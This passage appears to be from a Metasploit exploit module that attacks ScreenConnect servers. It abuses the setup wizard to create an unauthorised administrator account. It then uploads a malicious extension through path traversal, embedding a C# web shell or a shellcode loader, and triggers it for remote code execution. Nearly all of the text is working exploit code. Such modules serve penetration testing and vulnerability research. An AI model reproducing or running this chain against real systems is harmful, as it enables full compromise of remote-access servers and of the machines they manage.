fail_with(Failure::UnexpectedReply, 'Unexpected reply when initiating setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view state after initiating setup wizard.')    end    #    # 2. Advance to the next step in the setup.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        '__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')    end    #    # 3. Create a new administrator account.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        '__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$userNameBox' => datastore['USERNAME'],        'ctl00$Main$wizard$emailBox' => Faker::Internet.email(name: datastore['USERNAME']).to_s,        'ctl00$Main$wizard$passwordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$verifyPasswordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from create account step in setup wizard.')    end    print_status("Created account: #{datastore['USERNAME']}:#{datastore['PASSWORD']} (Note: This account will not be deleted by the module)")    #    # 4. Log in with this account to get an authenticated HTTP session.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'Administration'),      'keep_cookies' => true,      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to login with admin credentials.')    end    if res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}      anti_forgery_token = Regexp.last_match(1)    else      # The antiForgeryToken is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Could not locate anti forgery token after login with admin credentials.')      anti_forgery_token = ''    end    #    # 5. Create an extension to host the payload.    #    # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want, so we use    # Faker::Internet.uuid instead.    plugin_guid = Faker::Internet.uuid    payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"    # According to Microsoft (https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/) these are    # the list of valid C# keywords, we create a Rex::RandomIdentifier::Generator to generate new identifiera for    # use in the ASHX payload, and pass the list of valid C# keywords as a forbidden list so we dont accidentaly    # generate a valid keyword.    vars = Rex::RandomIdentifier::Generator.new({      forbidden: %w[        abstract add alias and args as ascending async await        base bool break by byte case catch char checked class const continue decimal default delegate descending do        double dynamic else enum equals event explicit extern false file finally fixed float for foreach from get        global goto group if implicit in init int interface internal into is join let lock long managed nameof        namespace new nint not notnull nuint null object on operator or orderby out override params partial private        protected public readonly record ref remove required return sbyte scoped sealed select set short sizeof        stackalloc static string struct switch this throw true try typeof uint ulong unchecked unmanaged unsafe ushort        using value var virtual void volatile when where while with yield      ]    })    if target['Arch'] == ARCH_CMD      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;public class #{vars[:var_handler_class]} : IHttpHandler{  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});    ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();    #{vars[:var_psi]}.FileName = "#{target['Platform'] == 'win' ? 'cmd.exe' : '/bin/sh'}";    #{vars[:var_psi]}.Arguments = "#{target['Platform'] == 'win' ? '/c' : '-c'} \\\"" + #{vars[:var_payload]} + "\\\"";    #{vars[:var_psi]}.RedirectStandardOutput = true;    #{vars[:var_psi]}.UseShellExecute = false;    Process.Start(#{vars[:var_psi]});  }  public bool IsReusable { get { return true; } }})    else      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;using System.Runtime.InteropServices;public class #{vars[:var_handler_class]} : IHttpHandler{  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);    Marshal.Copy(#{vars[:var_bytearray]}, 0, #{vars[:var_func_addr]}, #{vars[:var_bytearray]}.Length);    IntPtr #{vars[:var_thread_id]} = IntPtr.Zero;    CreateThread(IntPtr.Zero, UIntPtr.Zero, #{vars[:var_func_addr]}, IntPtr.Zero, 0, ref #{vars[:var_thread_id]});  }  public bool IsReusable { get { return true; } }})    end    manifest_data = %(<?xml version="1.0" encoding="utf-8"?><ExtensionManifest>  <Version>#{Faker::App.version}</Version>  <Name>#{Faker::App.name}</Name>  <Author>#{Faker::Name.name}</Author>  <ShortDescription>#{Faker::Lorem.sentence}</ShortDescription>  <Components>    <WebServiceReference SourceFile="#{payload_ashx}"/>  </Components></ExtensionManifest>)    zip_resources = Rex::Zip::Archive.new    zip_resources.add_file("#{plugin_guid}/Manifest.xml", manifest_data)    # We can leverage CVE-2024-1708 to write one level below the extension directory. This enable Linux targets to work.    zip_resources.add_file("#{plugin_guid}/../#{payload_ashx}", payload_data)    #    # 6. Upload the payload extension.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'InstallExtension'),      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => "[\"#{Base64.strict_encode64(zip_resources.pack)}\"]",      'headers' => {        'X-Anti-Forgery-Token' => anti_forgery_token      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to install extension.')    end    print_status("Uploaded Extension: #{plugin_guid}")    if target['Platform'] == 'win'      # On Windows the current working directory is C:\Windows\System32\ and we dont leak out the install path      # so we use the default installation location...      register_files_for_cleanup("C:\\Program Files (x86)\\ScreenConnect\\App_Extensions\\#{payload_ashx}")    else      # For Linux the current working is the install path (/opt/screenconnect) so we can use a relative path...      register_files_for_cleanup("App_Extensions/#{payload_ashx}")    end    begin      #      # 7. Trigger the payload by requesting the extensions .ashx file.      #      if target['Arch'] == ARCH_CMD        payload_data = payload.encoded.gsub('\\', '\\\\\\\\')      else        payload_data = payload.encoded      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'App_Extensions', payload_ashx),        'keep_cookies' => true,        'vars_post' => {          vars[:var_payload_key] => Base64.strict_encode64(payload_data)        }      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')      end    ensure      #      # 8. Ensure we remove the extension when we are done.      #      print_status("Removing Extension: #{plugin_guid}")      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'UninstallExtension'),        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => "[\"#{plugin_guid}\"]",        'headers' => {          'X-Anti-Forgery-Token' => anti_forgery_token        }      )      unless res&.code == 200        print_warning('Failed to remove the extension.')      end    end  end  def get_viewstate(res)    vs_input = res.get_html_document.at('input[name="__VIEWSTATE"]')    unless vs_input&.key? 'value'      print_error('Did not locate the __VIEWSTATE.')      return nil    end    vsgen_input = res.get_html_document.at('input[name="__VIEWSTATEGENERATOR"]')    unless vsgen_input&.key? 'value'      # The __VIEWSTATEGENERATOR is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Did not locate the __VIEWSTATEGENERATOR.')      return [vs_input['value'], '']    end    [vs_input['value'], vsgen_input['value']]  endend

Tag

#git